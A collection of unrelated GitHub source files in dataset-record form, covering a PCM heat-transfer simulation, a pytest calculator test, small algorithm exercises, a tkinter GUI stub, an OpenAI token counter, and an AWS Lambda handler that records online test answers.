Tamb_val_clean[int(n_data)] + (Tamb_val_clean[int(n_data+1)] - Tamb_val_clean[int(n_data)])*(time1/60 - n_data)\r\n\r\n T_amb_out = 20\r\n return T_amb_out\r\n\r\n\r\nQ_loss = 0\r\n# def ql(p, T, Nzv, Tvz, alpha):\r\n# return alpha * (Tvz[0:Nzv, p, 0] - T[0, :, p]) #+ 1000*0.91*0.95*1000\r\n#\r\n# def qprl(n, p, T, Tvz, alpha, neighField):\r\n# return alpha * np.dot(neighField[:, n], (T[0, :, p] - Tvz[0:Nzv, p, 0]))\r\n\r\n\r\n\r\ndef heatmap2d(arr: np.ndarray):\r\n plt.imshow(arr, cmap='viridis', interpolation='spline16')\r\n plt.colorbar()\r\n plt.show()\r\n# \r\n\r\n#MAIN FUNCTION\r\ndef heat_2d(x):\r\n Tvz_out = []\r\n alpha = fun.calcDN(h, e, cv, mi, k, v, kinv)\r\n fitness = 0\r\n c0 = 2000\r\n c1 = x[2] #61300\r\n Tpch = x[1]\r\n sigma = 0.5\r\n\r\n def c(T):\r\n return c0 + c1 * np.exp((-(T - Tpch) * (T - Tpch)) / sigma)\r\n\r\n dx = x[0] / (Nx - 1)\r\n dy = h / (Ny - 1)\r\n\r\n Tvz = np.zeros([Ny, int(tmax / dt) + 1])\r\n T = np.ones([Nx, Ny, int(tmax / dt) + 1])\r\n T[:, :, 0].fill(T0p)\r\n Tvz[:].fill(T_ambient(Tamb_val_clean, 0, dt))\r\n qp = 0\r\n Q_sum = np.zeros(int(tmax / dt))\r\n for p in tqdm(np.arange(0, int(tmax / dt), 1)):\r\n\r\n #vzduch\r\n for i in range(Ny):\r\n Tvz[i, p + 1] = Tvz[i, p] - Q_conv(i, alpha, dy, Tvz, T, p) / (m_dot * cv)\r\n Q_sum[p] = Q_sum[p] + Q_conv(i, alpha, dy, Tvz, T, p)\r\n\r\n #krajni body\r\n\r\n #levy horni\r\n T[0, 0, p + 1] = T[0, 0, p] + (2 * dt * qh) / (ro * dy * c(T[0, 0, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[0, 0, p])) * (T[0, 1, p] - T[0, 0, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[0, 0, p])) * (T[1, 0, p] - T[0, 0, p]) \\\r\n + (2 * dt) / (ro * dy * dx * c(T[0, 0, p])) * (Q_conv(0, alpha, dy, Tvz, T, p) + Q_rad(dy, dd, rad_val, p, dt) / 2)\r\n\r\n #levy dolni\r\n T[0, -1, p + 1] = T[0, -1, p] + (2 * dt * qd) / (ro * dy * c(T[0, -1, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[0, -1, p])) * (T[0, -1 - 1, p] - T[0, -1, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[0, -1, p])) * (T[1, -1, p] - T[0, -1, p]) \\\r\n + (2 * dt) / (ro * dy * dx * c(T[0, -1, p])) * (Q_conv(-1, alpha, dy, Tvz, T, p) + Q_rad(dy, dd, rad_val, p, dt) / 2)\r\n\r\n #pravy horni\r\n T[-1, 0, p + 1] = T[-1, 0, p] + (2 * dt * qh) / (ro * dy * c(T[-1, 0, p])) + (2 * dt * qp) / (ro * dx * c(T[-1, 0, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[-1, 0, p])) * (T[-1, 1, p] - T[-1, 0, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[-1, 0, p])) * (T[-1-1, 0, p] - T[-1, 0, p])\r\n\r\n #pravy dolni\r\n T[-1, -1, p + 1] = T[-1, -1, p] + (2 * dt * qd) / (ro * dy * c(T[-1, -1, p])) + (2 * dt * qp) / (ro * dx * c(T[-1, -1, p])) + \\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[-1, -1, p])) * (T[-1, -1-1, p] - T[-1, -1, p]) + (2 * lambd * dt) / (ro * dx ** 2 * c(T[-1, -1, p])) * (T[-1-1, -1, p] - T[-1, -1, p])\r\n\r\n for m in range(1, Nx - 1):\r\n\r\n #cyklus pro dolni hranu\r\n T[m, -1, p + 1] = T[m, -1, p] + (2 * dt * qd) / (ro * dy * c(T[m, -1, p])) + (lambd * dt) / (ro * dx ** 2 * c(T[m, -1, p])) * (T[m + 1, -1, p] + T[m - 1, -1, p] - 2*T[m, -1, p]) +\\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[m, -1, p])) * (T[m, 1, p] - T[m, 0, p])\r\n\r\n #cyklus pro horni hranu\r\n T[m, 0, p + 1] = T[m, 0, p] + (2 * dt * qh) / (ro * dy * c(T[m, 0, p])) + (lambd * dt) / (ro * dx ** 2 * c(T[m, 0, p])) * (T[m + 1, 0, p] + T[m - 1, 0, p] - 2*T[m, 0, p]) +\\\r\n (2 * lambd * dt) / (ro * dy ** 2 * c(T[m, 0, p])) * (T[m, -1 - 1, p] - T[m, -1, p])\r\n\r\n for n in range(1, Ny - 1):\r\n\r\n\r\n #cyklus pro levou hranu - under correction\r\n T[0, n, p + 1] = T[0, n, p] + (lambd * dt) / (ro * dy ** 2 * c(T[0, n, p])) * (T[0, n + 1, p] + T[0, n - 1, p] - 2 * T[0, n, p]) + \\\r\n (2 * lambd * dt) / (ro * dx ** 2 * c(T[0, n, p])) * (T[1, n, p] - T[0, n, p]) + \\\r\n (2 * dt) / (ro * dx * dy * c(T[0, n, p])) * (Q_conv(n, alpha, dy, Tvz, T, p) + Q_rad(dy, dd, rad_val, p, dt))\r\n\r\n #cyklus pro pravou hranu\r\n T[-1, n, p + 1] = T[-1, n, p] + (2 * dt * qp) / (ro * dy * c(T[-1, n, p])) + (lambd * dt) / (ro * dy ** 2 * c(T[-1, n, p])) * (T[-1, n + 1, p] + T[-1, n - 1, p] - 2 * T[-1, n, p]) + \\\r\n (2 * lambd * dt) / (ro * dx ** 2 * c(T[-1, n, p])) * (T[-1 -1, n, p] - T[-1, n, p])\r\n #stred\r\n T[m, n, p + 1] = T[m, n, p] + (lambd * dt) / (ro * dy ** 2 * c(T[m, n, p])) * (T[m, n + 1, p] + T[m, n - 1, p] - 2*T[m, n, p]) +\\\r\n (lambd * dt) / (ro * dx ** 2 * c(T[m, n, p])) * (T[m + 1, n, p] + T[m - 1, n, p] - 2*T[m, n, p])\r\n\r\n Tvz[:, p + 1] = np.roll(Tvz[:, p + 1], 1)\r\n Tvz_out.append(Tvz[0, p + 1])\r\n Tvz[0, p + 1] = T_ambient(Tamb_val_clean, p, dt)\r\n\r\n if (p>Ny):\r\n fitness = fitness + (Tvz[-1, p + 1] - T_set)**2\r\n\r\n return T, Tvz, Tvz_out, fitness, Q_sum #\r\n\r\n#EFFECTIVE HEAT CAPACITY\r\ndef ceff(T, c0, c1, Tpch, sigma):\r\n return c0 + c1 * np.exp((-(T - Tpch) * (T - Tpch)) / sigma)\r\n\r\n#2D PLOT\r\n# plt.figure()\r\n# plt.plot(Tvz_out[0:37000:600])\r\n# plt.plot(T_out[1, 1, 0:37000:600])\r\n# plt.plot(Tamb_val_clean[60*12:60*13])\r\n# plt.plot(rad_val[60*12:60*13])\r\n# plt.legend(['Outlet - Air temperature', 'PCM surface temperature', 'Inlet - Ambient temperature', 'Solar irradiation'])\r\n# plt.show()\r\n\r\n# fig, ax = plt.subplots()\r\n#\r\n# for i in range(len(T_out[0, 0, :])):\r\n# ax.cla()\r\n# ax.set_title(\"frame {}\".format(i))\r\n# heatmap2d(np.transpose(np.vstack((Tvz[:, i], T_out[:, :, i]))))\r\n#\r\n# plt.pause(0.1)\r\n# plt.clf()\r\n# #plt.imshow(T[:, :, 600])\r\n\r\n# \r\nx = [0.01, 41, 61300]\r\nT_out, Tvz, Tvz_out, f2, Q_sum = heat_2d(x)\r\n\r\n\r\n\r\n# print('Iteration number: ' + str(counter))\r\n# print('Elapsed time: ' + str(end - start))\r\n# print('Fitness: ' + str(f2))\r\n# print('Variables: Tpch, Tpch2, c0, c1, c2, sigma1, sigma2')\r\n# print('Current x: ' + str(x))\r\n# print('----------------------------------------------------------------')\r\n# list.append(f2)\r\n\r\n# plt.figure()\r\n# plt.plot(Tvz_out[0:-1])\r\n# plt.plot(T_out[1, 1, 0:-1])\r\n# plt.plot(Tamb_val_clean[start_hour])\r\n# #plt.plot(rad_val[60 * start_hour:int(60 * end_hour)])\r\n# plt.legend(['Outlet - Air temperature', 'PCM surface temperature', 'Inlet - Ambient temperature', 'Solar irradiation'])\r\n# plt.show()\r\nplt.figure(figsize=(20, 12))\r\nplt.subplot(231)\r\n#plt.figure(figsize=(17, 10), dpi=150)#, facecolor='w', edgecolor='k'\r\n\r\nplt.plot(Tvz_out[0:-1:600])\r\nplt.plot(T_out[0, -1, 0:-1:600])\r\nplt.plot(Tamb_val_clean[60 * start_hour: int(60 * end_hour)])\r\n#plt.plot(rad_val[60 * start_hour:int(60 * end_hour)])\r\n\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Temperature [°C]')\r\n# plt.title('Thickness: {:0.3f} m, Tpch = {:02.02f} °C, c1 = {:05.02f}'.format(x[0], x[1], x[2]))\r\n\r\nplt.legend(['Outlet - Air temperature', 'PCM surface temperature', 'Inlet - Ambient temperature'])\r\n\r\n\r\n\r\n# plt.figure(num=None, figsize=(17, 7), dpi=100, facecolor='w', edgecolor='k')\r\n# plt.subplot(1, 2, 1)\r\n# plt.plot(np.arange(t_start, t_max, dt), T[5, :p_max], np.arange(t_start, t_max, dt), core[:p_max])\r\n# plt.xlabel('Time iteration []')\r\n# plt.ylabel('Temperature [°C]')\r\n# plt.title('Temp. evolution comparison, middle of PCM layer-experiment vs simulation')\r\n# plt.legend(['Simulation', 'Experiment'])\r\n# print(T[5, :])\r\n\r\nplt.subplot(232)\r\nplt.plot(Tvz_out[0:-1:600])\r\nplt.plot(np.linspace(0, tmax/60, np.size(Tvz_out)), np.ones(np.size(Tvz_out)) * T_set,'--r')\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Temperature [°C]')\r\nplt.legend(['T_out - Outlet air temperature', 'T_set - Set outlet air temperature'])\r\n\r\n# plt.subplot(233)\r\n# plt.plot(np.linspace(x[1]-20, x[1]+20, 200), ceff(np.linspace(x[1]-20, x[1]+20, 200), c0, c1, x[1], sigma))\r\n# plt.xlabel('Temperature [°C]')\r\n# plt.ylabel('Effective heat capacity [J/(kg K)]')\r\n# plt.title('Opt ceff = {:04.0f} + {:05.0f}exp(-(T - {:02.2f})^2)/{:02.2f}'.format(c0, c1, x[1], sigma))\r\n\r\nplt.subplot(234)\r\nplt.plot(rad_val[60 * start_hour:int(60 * end_hour)], 'r') #rad_val[60 * start_hour:int(60 * end_hour)]\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Solar irradiance [W/m^2]')\r\n\r\nplt.subplot(235)\r\nplt.plot(np.linspace(0, tmax/60, np.size(Q_sum)), Q_sum) #np.linspace(0, tmax/60, np.size(Q_sum)\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Convective heat flux into PCM [J/min]')\r\n#print(Q_sum[-10:])\r\n\r\n# res = (Tvz_out[0:-1:600] - np.ones(np.size(Tvz_out))\r\n\r\nplt.subplot(236)\r\nplt.plot(np.linspace(0, tmax / 60, np.size(Tvz_out[0:-1:600])), (Tvz_out[0:-1:600] - np.ones(np.size(Tvz_out[0:-1:600])) * T_set), '--g')\r\nplt.xlabel('Time [min]')\r\nplt.ylabel('Temperature residuum [°C]')\r\n\r\n# plt.figure()\r\n# plt.plot(np.linspace(41 - 20, 41 + 20, 200),\r\n# ceff(np.linspace(41 - 10, 41 + 10, 200), 2000, 61300, 41, 2.1))\r\n# plt.xlabel('Temperature [°C]')\r\n# plt.ylabel('Effective heat capacity [J/(kg K)]')\r\n# plt.title('ceff(T) = {:04.0f} + {:05.0f}exp(-(T - {:02.2f})^2)/{:02.2f}'.format(2000, 61300, 41, 2.1))\r\n\r\nplt.show()\r\n\r\n\r\n\r\n","repo_name":"MartinZal/PRES2020","sub_path":"heat_2d_validation_REWORK.py","file_name":"heat_2d_validation_REWORK.py","file_ext":"py","file_size_in_byte":11437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"15752711645","text":"# -*- coding: utf-8 -*-\n# @File : test_calc.py\n# @Author : Elf\n# @Time : 2021/2/3 23:24\n\n\nfrom HogwartsLG6.taskwork.stage4_record_pytest.common.calc import Calculator\nimport pytest\nimport yaml\n\nwith open(\"./datas/calc.yml\", encoding='utf-8') as f:\n f = yaml.safe_load(f)\n\n add = f[\"add\"]\n add_datas = add[\"datas\"]\n add_myid = add[\"myid\"]\n\n div = f[\"div\"]\n div_datas = div[\"datas\"]\n div_myid = div[\"myid\"]\n\n\nclass TestCalc:\n def setup_class(self):\n print(\"【开始计算加法和除法】\")\n self.calc = Calculator()\n\n def teardown_class(self):\n print(\"【加法和除法计算结束】\")\n\n def setup(self):\n print(\"用例执行开始...\")\n\n def teardown(self):\n print(\"用例执行结束...\")\n\n @pytest.mark.parametrize(\n 'a, b, expect',\n add_datas,\n ids=add_myid\n )\n def test_add(self, a, b, expect):\n result = self.calc.add(a, b)\n if isinstance(result, float):\n result = round(result, 2)\n assert result == expect\n\n @pytest.mark.parametrize(\n 'a, b, expect',\n div_datas,\n ids=div_myid\n )\n def test_div(self, a, b, expect):\n result = self.calc.div(a, b)\n if isinstance(result, float):\n result = round(result, 2)\n assert result == expect\n\n\nif __name__ == \"__main__\":\n pass\n","repo_name":"fatfatfatFatTiger/HogwartsLG6","sub_path":"taskwork/stage04_record_pytest/testing/test_calc.py","file_name":"test_calc.py","file_ext":"py","file_size_in_byte":1368,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72116780057","text":"from tkinter import *\n\nroot = Tk()\n# root.attributes('-fullscreen',True) // this attribute show frame in full screen\nroot.title(\"Parking System Design by DNR\")\n\n\ndef showTitle():\n titleLabel = Label(root, text=\"Smart Parking System\", font=(\"Helvetica\", 15), width=30, height=3)\n titleLabel.pack()\n\n\ndef select_Image_From_System():\n print(\"ok\")\n\n\ndef exit_command():\n root.quit()\n\n\nshowTitle()\nexit_button = Button(root, text=\"EXIT\", command=exit_command, bg=\"brown\", font=(\"Helvetica\", 15), fg=\"white\", bd=4,\n padx=2, pady=4)\nexit_button.pack()\nexit_button.place(relx=\"0.8\", rely=\"0.9\")\n\nimage_from_file_btn = Button(root, text=\"Select Image From File System\", bg=\"yellow\", font=(\"Helvetica\", 15),\n fg=\"green\", bd=4, padx=2, pady=4, command=select_Image_From_System)\nimage_from_file_btn.pack()\nimage_from_file_btn.place(relx=\"0.05\", rely=\"0.2\")\n\n# titleLabel.grid(column=0,row=1,padx=150,pady=5) // show label in specific location\n# myLabel.pack()\n# Window frame size\nroot.geometry(\"600x600\")\n# set minimum window size value\nroot.minsize(200, 200)\n# set maximum window size value\nroot.maxsize(800, 800)\nroot.mainloop()\n","repo_name":"Nc-upadhyay/ParkEasePro","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"72462843738","text":"from sys import stdin\r\n\r\ndef tarifa(calls) -> str:\r\n mile, juice = 0, 0\r\n for call in calls:\r\n n = 0\r\n while not(30*n<=call<= 30*(n+1)-1): n += 1\r\n mile += 10*(n+1)\r\n n = 0\r\n while not(60*n<=call<= 60*(n+1)-1): n += 1\r\n juice += 15*(n+1)\r\n\r\n if mile == juice:\r\n return \"Mile Juice \" + str(mile)\r\n elif mile < juice:\r\n return \"Mile \" + str(mile)\r\n else: return \"Juice \" + str(juice)\r\n\r\ndef main():\r\n t = int(stdin.readline().strip())\r\n SALIDA = \"\"\r\n for i in range(t):\r\n c = stdin.readline().strip()\r\n calls = [int(c) for c in stdin.readline().split()]\r\n SALIDA += \"Case {0}: {1}\\n\".format(i+1, tarifa(calls))\r\n print(SALIDA.strip())\r\nmain()\r\n \r\n","repo_name":"aanzolaavila/competitive-problems","sub_path":"Maratones/Basica 2015-2/corregidos/tariff.py","file_name":"tariff.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"70769353817","text":"\"\"\"\n5\n0K0K0\nK000K\n00K00\nK000K\n0K0K0\n\"\"\"\n\n\ndef read_board():\n rows = int(input())\n return [list(input()) for _ in range(rows)]\n\n\ndef boundaries(board, row, col):\n if row in range(len(board)) and col in range(len(board)):\n return True\n return False\n\n\ndef calculate_attacks(board, row, col):\n tgt_coor = [(-1, -2), (-2, -1), (-2, 1), (-1, 2), (1, 2), (2, 1), (2, -1), (1, -2)]\n attacks = 0\n for coor in tgt_coor:\n tgt_row, tgt_col = coor\n tgt_row += row\n tgt_col += col\n if boundaries(board, tgt_row, tgt_col):\n if board[tgt_row][tgt_col] == 'K':\n attacks += 1\n return attacks\n\n\ndef find_max_attack(board):\n max_attack = 0\n max_attack_coor = ()\n for row in range(len(board)):\n for col in range(len(board[0])):\n if board[row][col] == 'K':\n attacks = calculate_attacks(board, row, col)\n if attacks > max_attack:\n max_attack = attacks\n max_attack_coor = (row, col)\n return max_attack, max_attack_coor\n\n\ndef remove_knight(board, removed):\n max_attack, max_coor = find_max_attack(board)\n if max_attack == 0:\n return removed\n max_row, max_col = max_coor\n board[max_row][max_col] = '0'\n removed += 1\n return remove_knight(board, removed)\n\n\nmatrix = read_board()\nprint(remove_knight(matrix, 0))\n","repo_name":"StanDobrev11/Python_Advanced","sub_path":"07_Multidimensional_Lists_-_Exercise_2/03_knights_ines.py","file_name":"03_knights_ines.py","file_ext":"py","file_size_in_byte":1392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"9965340861","text":"from typing import List\n\nimport tiktoken\n\nfrom vo.ai_model import AiModel\n\nDEFAULT_ENCODING: str = \"cl100k_base\"\n\n\ndef calculate_token_amount(ai_model: AiModel, content: List[dict], return_messages: List[str]):\n \"\"\"Returns the number of tokens of the content.\n Based on OpenAI cookbook .\n https://github.com/openai/openai-cookbook/blob/main/examples/How_to_count_tokens_with_tiktoken.ipynb\"\"\"\n try:\n encoding = tiktoken.encoding_for_model(ai_model)\n except KeyError:\n return_messages.append(\"Warning: model not found. Using cl100k_base encoding.\")\n encoding = tiktoken.get_encoding(DEFAULT_ENCODING)\n if ai_model == AiModel.GPT_3_5_TURBO:\n return_messages.append(\n \"Warning: gpt-3.5-turbo may change over time. Returning num tokens assuming gpt-3.5-turbo-0301.\"\n )\n return calculate_token_amount(AiModel.GPT_3_5_TURBO_0301, content)\n elif ai_model == AiModel.GPT_4:\n return_messages.append(\"Warning: gpt-4 may change over time. Returning num tokens assuming gpt-4-0314.\")\n return calculate_token_amount(AiModel.GPT_4.GPT_4_0314, content)\n elif ai_model == AiModel.GPT_3_5_TURBO_0301:\n tokens_per_message = 4 # every message follows <|start|>{role/name}\\n{content}<|end|>\\n\n tokens_per_name = -1 # if there's a name, the role is omitted\n elif ai_model == AiModel.GPT_4.GPT_4_0314:\n tokens_per_message = 3\n tokens_per_name = 1\n else:\n raise NotImplementedError(\n f\"\"\"num_tokens_from_messages() is not implemented for model {ai_model}. See https://github.com/openai/openai-python/blob/main/chatml.md for information on how messages are converted to tokens.\"\"\")\n num_tokens = 0\n for message in content:\n num_tokens += tokens_per_message\n for key, value in message.items():\n num_tokens += len(encoding.encode(value))\n if key == \"name\":\n num_tokens += tokens_per_name\n num_tokens += 3 # every reply is primed with <|start|>assistant<|message|>\n return num_tokens\n","repo_name":"pavlass2/token_calculator","sub_path":"token_calculator.py","file_name":"token_calculator.py","file_ext":"py","file_size_in_byte":2066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"29296404414","text":"\"\"\" 케빈 베이컨의 6단계 법칙 \"\"\"\nimport sys\ninput = sys.stdin.readline\nfrom collections import deque\n\n# bfs 탐색\ndef bfs(start):\n queue = deque([start])\n visited[start] = 1\n\n while queue:\n target = queue.popleft()\n \n # 친구관계 탐색: 탐색 안된 친구라면 탐색.\n for i in graph[target]:\n if not visited[i]:\n # 탐색하기 위한 횟수 체크\n visited[i] = visited[target] + 1\n queue.append(i)\n\n# 그래프 입력\nn, m = map(int, input().split())\ngraph = [[] for _ in range(n+1)]\nfor _ in range(m):\n a, b = map(int, input().split())\n graph[a].append(b)\n graph[b].append(a)\n\n# 케빈 베이컨의 수\nresult = []\nfor i in range(1, n+1):\n visited = [0] * (n+1)\n bfs(i)\n result.append(sum(visited))\n\nprint(result.index(min(result) + 1))","repo_name":"InryeolChoi/baekjoon","sub_path":"class_3/1389.py","file_name":"1389.py","file_ext":"py","file_size_in_byte":870,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"68"} +{"seq_id":"584310063","text":"'''\n@Author: \nDate of creation: 2018:12:28 1:10:11\nPurpose of the micro service: \n'''\n\n'''\nANY TODO\n\n'''\n\n#IMPORT MODULES\nimport json\nfrom os import environ\nimport WOHeader\nimport db_utility\nimport pymongo\nimport datetime\nimport random\nimport boto3\n#CONSTANTS\nMISSING_ERROR_MSG = \"Missing required parameter in the request\"\nUNAUTHENTICATION_ERROR_MSG = \"Unauthenticated access. Please give the valid token\"\nDATABASE_CONNECTION_ERROR = \"Failed to insert in the Database\"\n\n#TEST EVENT\ntestEvent = { \"body\" : {\"candidateToken\":\"mxaawaopld\",'questionId':2,'sort_order':4,'answer':{'mcq':[1,2],'videoUrl':\"youtube.com\",\"textUrl\":\"slack.com\"}}}\nrequiredParams = [\"candidateToken\",\"questionId\",'answer']\n\ndef checkAllRequiredValuesPresent(request):\n\tfor param in requiredParams:\n\t\tif(param not in request):\n\t\t\tprint(\"The value \"+param+\" missing\")\n\t\t\treturn False\t\n\treturn True\n\ndef validateRequest(request):\n\theaderValidation = True\n\n\t'''\n\tBOTO3 TO VALUDATE THE HEADER IF NEEDED\n\tcheck the environment flag (\"isHeaderValidationRequired\")\n\t'''\n\tif('candidateToken' not in request['body'] and 'testMode' not in request['body'] and environ.get('isHeaderValidationRequired')):\n\t\trequestBody = WOHeader.run(request)\n\t\tif(requestBody['authenticationCode'] !=\"200\"):\n\t\t\theaderValidation = False\n\telse:\n\t\trequestBody = request['body']\n\t'''\n\tVALIDATE CANDIDATE TOKEN\n\t'''\n\tif('candidateToken' in requestBody):\n\t\tcandidateInfo = validateCandidate(requestBody)\n\t\trequestBody['candidate'] = candidateInfo\n\n\tresponse = {}\n\tif(not headerValidation):\n\t\tprint(UNAUTHENTICATION_ERROR_MSG)\n\t\tresponse = {\"error\":UNAUTHENTICATION_ERROR_MSG,\"errorCode\":404}\n\telif(not checkAllRequiredValuesPresent(requestBody)):\n\t\tprint(MISSING_ERROR_MSG)\n\t\tresponse = {\"error\":MISSING_ERROR_MSG, \"errorCode\":402}\n\t'''\n\tBUSINESS LOGIC VALIDATION HERE\n\t'''\n\tif \"error\" not in response:\n\t\tresponse = requestBody\n\treturn response\n \ndef validateCandidate(requestBody):\n\ttestDetail=db_utility.fetch_where(\"test\",{\"token\":requestBody['candidateToken']})\n\tif len(testDetail)==0:\n\t\treturn False\n\telse:\n\t\tif (testDetail[0]['is_active']):\n\t\t\torgDetail=db_utility.fetch_where(\"organization_details\",{\"organization_id\":testDetail[0]['organization_id']})[0]\n\t\t\tif (orgDetail['is_active']):\n\t\t\t\tquestionSetDetail=db_utility.fetch_where(\"question_set\",{\"question_set_id\":testDetail[0]['question_set_id']})[0]\n\t\t\t\tif (questionSetDetail['is_active']):\n\t\t\t\t\treturn True\n\t\telse:\n\t\t\treturn False\n\n\ndef lambda_handler(event,context):\n\tproxyResponse = {}\n\tresponse = {}\n\tproxyResponse['headers'] = {\"Access-Control-Allow-Methods\":\"*\", \"Access-Control-Allow-Headers\":\"*\", \"Access-Control-Allow-Origin\":\"*\"}\n\n\tvalidRequest = validateRequest(event)\n\tif('error' in validRequest):\n\t\tproxyResponse['statusCode'] = validRequest['errorCode']\n\t\tproxyResponse['error'] = validRequest['error']\n\telse:\n\t\t'''\n\t\tBUSINESS LOGIC STARTS HERE\n\t\t'''\t\n\t\t# print(validRequest)\n\t\tcandidateToken=validRequest['candidateToken']\n\t\ttestDetail=db_utility.fetch_where(\"test\",{\"token\":candidateToken})[0]\n\t\ttestId=testDetail['test_id']\n\t\t# questionSetDetail=db_utility.fetch_where(\"question_set\",{\"question_set_id\":testDetail['question_set_id']})[0]\n\t\t# sampleQuestionSetDetails=db_utility.fetch_where(\"question_set\",{\"question_set_id\":questionSetDetail['sample_question_set_id']})[0]\n\t\t# print(sampleQuestionSetDetails['question_list'])\n\t\tquestionId=validRequest['questionId']\n\t\tquestionDetail=db_utility.fetch_where('question_master',{'question_id':questionId})[0]\n\t\tanswer=validRequest['answer']\n\t\tprint(answer)\n\t\tif questionDetail['question_type_id']==1:\n\t\t\tparam={}\n\t\t\tparam['response_id']=db_utility.fetch_next_id(\"test_response\",\"response_id\")\n\t\t\tparam[\"_id\"]=param['response_id']\n\t\t\tparam['question_id']=validRequest['questionId']\n\t\t\tparam['test_id']=testId\n\t\t\tparam['answer_mcq']=answer['mcq']\n\t\t\tparam['submitted_at']=datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n\t\telif questionDetail['question_type_id']==2:\n\t\t\tparam={}\n\t\t\tparam['response_id']=db_utility.fetch_next_id(\"test_response\",\"response_id\")\n\t\t\tparam[\"_id\"]=param['response_id']\n\t\t\tparam['question_id']=validRequest['questionId']\n\t\t\tparam['test_id']=testId\n\t\t\tif 'videoUrl' in answer:\n\t\t\t\tparam['video_url']=answer['videoUrl']\n\t\t\tif 'textUrl' in answer:\n\t\t\t\tparam['text_url']=answer['textUrl']\n\t\t\tparam['submitted_at']=datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n\t\tdata=db_utility.insert_data_one('test_response',param)\n\t\t# print(\"1\")\n\t\t# print(data)\n\t\tif data==\"200\":\n\t\t\ttestQuestionTracker=db_utility.fetch_where_and('test_question_tracker',[{'test_id':testId,'question_id':questionId}])[0]\n\t\t\tparam={}\n\t\t\tcurrentSortOrder=testQuestionTracker['sort_order']\n\t\t\tprint(currentSortOrder)\n\t\t\tparam=testQuestionTracker\n\t\t\tparam['submit_status']=True\n\t\t\ttrackerData=db_utility.update_data_one('test_question_tracker',{\"question_tracker_id\":testQuestionTracker['question_tracker_id']},param)\n\t\t\t# print(data)\n\t\tif trackerData==\"200\":\n\t\t\tparam={}\n\t\t\tparam['tracker_id']=db_utility.fetch_next_id(\"log_tracker\",\"tracker_id\")\n\t\t\tparam['_id']=param['tracker_id']\n\t\t\tparam['test_id']=testId\n\t\t\tparam['activity_type_id']=\"004\"\n\t\t\tparam['activity_time']=datetime.datetime.now().strftime(\"%Y-%m-%dT%H:%M:%S\")\n\t\t\t# logData=db_utility.insert_data_one('log_tracker',param)\n\t\t\tlogData=\"200\"\n\t\tif logData==\"200\":\n\t\t\tprint(\"Data Inserted\")\n\t\t\t# sortOrder=0\n\t\t\tsortOrder=currentSortOrder+1\n\t\t\tprint(sortOrder)\n\t\t\twhile True:\n\t\t\t\tnextQuestionId=db_utility.fetch_where('test_question_tracker',{'sort_order':sortOrder,'test_id':testId})\t\t\t\t\n\t\t\t\tif (len(nextQuestionId)>0 and not nextQuestionId[0]['submit_status']):\n\t\t\t\t\tnextQuestionId=nextQuestionId[0]['question_id']\n\t\t\t\t\tbreak\n\t\t\t\telif (len(nextQuestionId)>0 and nextQuestionId[0]['submit_status'] and sortOrder!=currentSortOrder):\n\t\t\t\t\tsortOrder=sortOrder+1\n\t\t\t\telif (len(nextQuestionId)==0 and sortOrder!=currentSortOrder):\n\t\t\t\t\tsortOrder=1\n\t\t\t\telif (len(nextQuestionId)>0 and sortOrder==currentSortOrder):\n\t\t\t\t\tnextQuestionId=0\n\t\t\t\t\tbreak\n\t\t\t\telse:\n\t\t\t\t\tnextQuestionId=0\n\t\t\t\t\tbreak\n\t\tif nextQuestionId==0:\n\t\t\tparam={}\n\t\t\tparam['test_ended']=True\n\t\telse:\n\t\t\tclient = boto3.client('lambda',region_name = environ['Region'])\n\t\t\t# print(\"Invoking AkriValidateToken micro service to validate token\")\n\t\t\tnextQuestion = client.invoke(\n\t\t\tFunctionName='WO-'+environ['stage']+'-LookupQuestion',\n\t\t\tInvocationType='RequestResponse',\n\t\t\tPayload=json.dumps({\"body\":{'questionId': nextQuestionId,\"candidateToken\":candidateToken}})\n\t\t\t)\n\t\t\t\n\t\t\tnextQuestion= json.loads(nextQuestion['Payload'].read().decode(\"utf-8\"))\n\t\t\tparam={}\n\t\t\tparam=nextQuestion['body']\n\t\t\tparam=json.loads(param)\n\t\t\tparam['sort_order']=sortOrder\n\t\t\tparam['test_ended']=False\n\t\t\tprint(param)\n\t\t\t\t\n\t\t\tif len(param)>0:\n\t\t\t\tprint(\"Data Fetched\")\n\t\t\t\t# param=questionDetail['body']\n\t\t\telse:\n\t\t\t\tparam['statusCode']=400\n\t\t\t\tparam['Error']=DATABASE_CONNECTION_ERROR\n\t\tresponse=param\n\t\t'''\n\t\tBUSINESS LOGIC ENDS HERE BY RETURNING RESPONSE JSON\n\t\t'''\t\n\t\tproxyResponse['statusCode'] = 200\n\t\t# response={}\n\t\t# print(response)\n\t\tproxyResponse['body'] = json.dumps(response)\n\tprint(proxyResponse)\n\treturn proxyResponse\n\n# 